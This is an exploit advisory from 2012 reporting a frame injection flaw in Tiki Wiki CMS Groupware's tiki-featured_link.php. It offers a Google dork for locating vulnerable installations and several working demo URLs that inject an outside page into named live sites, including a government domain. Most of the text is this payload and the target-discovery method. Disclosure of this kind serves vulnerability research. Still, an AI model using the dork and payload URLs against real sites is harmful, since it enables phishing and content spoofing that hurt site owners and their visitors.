Tiki Wiki CMS Groupware suffers from a frame inclusion vulnerability.
05720d1da49c07e5b6c22ca7d008fc4d76b707bf99890daa696a95820a56dbda
# Exploit Title: Tiki Wiki CMS Groupware Frame Injection
# Date: 17.02.2012
# Author: Sony
# Software Link: http://info.tiki.org/tiki-index.php
# Google Dorks: inurl:tiki-featured_link.php?type=
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html
..................................................................
We have Frame Injection in the Tiki Wiki CMS Groupware.
Demo:
http://stats.tiki.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com
http://2.bp.blogspot.com/-em2guD5zVl4/Tz6R6Rp4eGI/AAAAAAAAAg4/PjyEb1BAEyY/s1600/tiki.JPG
http://wiki.lxcenter.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com
http://www.maps.gov.ck/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com
etc..